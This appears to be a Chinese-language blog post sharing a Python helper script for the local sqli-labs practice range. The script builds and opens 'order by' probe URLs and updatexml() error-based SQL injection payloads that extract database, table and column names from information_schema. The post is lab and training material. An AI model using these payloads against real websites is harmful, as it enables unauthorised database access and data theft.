写了个 Python 脚本,关于 Sql-labs 的 xpath 注入

order by:利用 order by 语句,相当于判断闭合方式

updatexml:利用 xpath 注入语句,打开网页查看结果

all:相当于上面两个模块一起使用

关卡为 sqllab 靶场的关卡编号

代码如下:

import time
import webbrowser
import sys

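"""Interactive helper for the local sqllab practice target (Less-1 .. Less-6).

Three modes are offered:
  1 (order by)  - opens "order by 1200" / "order by 1" probe pages for every
                  candidate closer, so the working closer can be picked by eye.
  2 (updatexml) - asks for a closer and a subquery, then opens four updatexml
                  probe pages whose substr() windows step through the result.
  3 (all)       - runs mode 1 and then mode 2.

All pages are opened in the default browser; the script itself reads nothing
back from the server. Results are judged by looking at the browser.
"""

# Menu labels, printed in this order. The original used sets here, which
# print in arbitrary order and made the menu differ between runs.
MOKUAI = ['1 (order by)', '2 (updatexml)', '3 (all)']

# Level numbers offered for the "关卡" prompt (Less-<n>).
GKA = ['1', '2', '3', '4', '5', '6']

# Candidate quote/bracket closers tried one after another in mode 1.
ZIFU = ["'", "')", '")', '"', "'))", '"))']

# Example subqueries printed as hints before each prompt; "xxx" marks the
# places the user fills in.
YUJUA = [
    'database()',
    'group_concat(table_name) from information_schema.tables where table_schema="xxx"',
    'group_concat(column_name) from information_schema.columns where table_schema="xxx" and table_name="xxx"',
    'group_concat(xxx,0x7e,xxx) from xxx',
    'group_concat(xxx) from xxx',
]

# Prefix of every URL built below; the level number is appended to it.
BASE_URL = "http://127.0.0.1/sqllab/Less-"

# substr() start positions used in mode 2: consecutive windows 31 chars apart.
SUBSTR_OFFSETS = (1, 32, 63, 94)

SEPARATOR = '------------------------------------------------------'


def order_by_urls(level, closer):
    """Return the two "order by" probe URLs for *level* using *closer*.

    Args:
        level: level number as a string, e.g. "1".
        closer: quote/bracket closer placed right after ``id=1``.

    Returns:
        A ``(high, low)`` tuple: the "order by 1200" URL first, then the
        "order by 1" URL, matching the order in which they are opened.
    """
    prefix = BASE_URL + level + "/?id=1" + closer
    return (prefix + "order by 1200 --+", prefix + "order by 1 --+")


def updatexml_url(level, closer, subquery, offset):
    """Return the updatexml probe URL for one substr() window.

    Args:
        level: level number as a string.
        closer: quote/bracket closer placed right after ``id=1``.
        subquery: text placed after ``select`` inside the probe.
        offset: 1-based substr() start position (see ``SUBSTR_OFFSETS``).
    """
    return (
        BASE_URL + level + "/?id=1" + closer
        + " and updatexml(1,concat(0x5e,(substr((select " + subquery
        + ")," + str(offset) + ")),0x5e),1) --+"
    )


def open_url(url):
    """Print *url* so the user can see what was opened, then open it."""
    print(url)
    webbrowser.open(url)


def run_order_by(level):
    """Mode 1: open both "order by" probes for every closer in ``ZIFU``."""
    for closer in ZIFU:
        for url in order_by_urls(level, closer):
            open_url(url)


def run_updatexml(level):
    """Mode 2: prompt for a closer, then loop prompting for subqueries.

    Each subquery is opened once per offset in ``SUBSTR_OFFSETS``. Entering
    ``0`` at the subquery prompt ends the program.
    """
    closer = input("---请输入闭合--- :")
    while True:
        for hint in YUJUA:
            print(hint)
        print(SEPARATOR)
        subquery = input("(输入 0 停止)请输入sql注入语句 :")
        if subquery == '0':
            sys.exit(0)
        for offset in SUBSTR_OFFSETS:
            open_url(updatexml_url(level, closer, subquery, offset))
        print(SEPARATOR)


def main():
    """Show the menus, read the mode and level, and dispatch."""
    for mok in MOKUAI:
        print(mok)
    b1 = input("---请输入模块(最前方数字)--- :")

    for gk in GKA:
        print(gk)
    s = input("---请输入关卡--- :")

    if b1 == '1':
        run_order_by(s)
    elif b1 == '2':
        run_updatexml(s)
    else:
        # Any other answer behaves as mode 3: both probes in sequence.
        run_order_by(s)
        run_updatexml(s)


if __name__ == "__main__":
    main()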

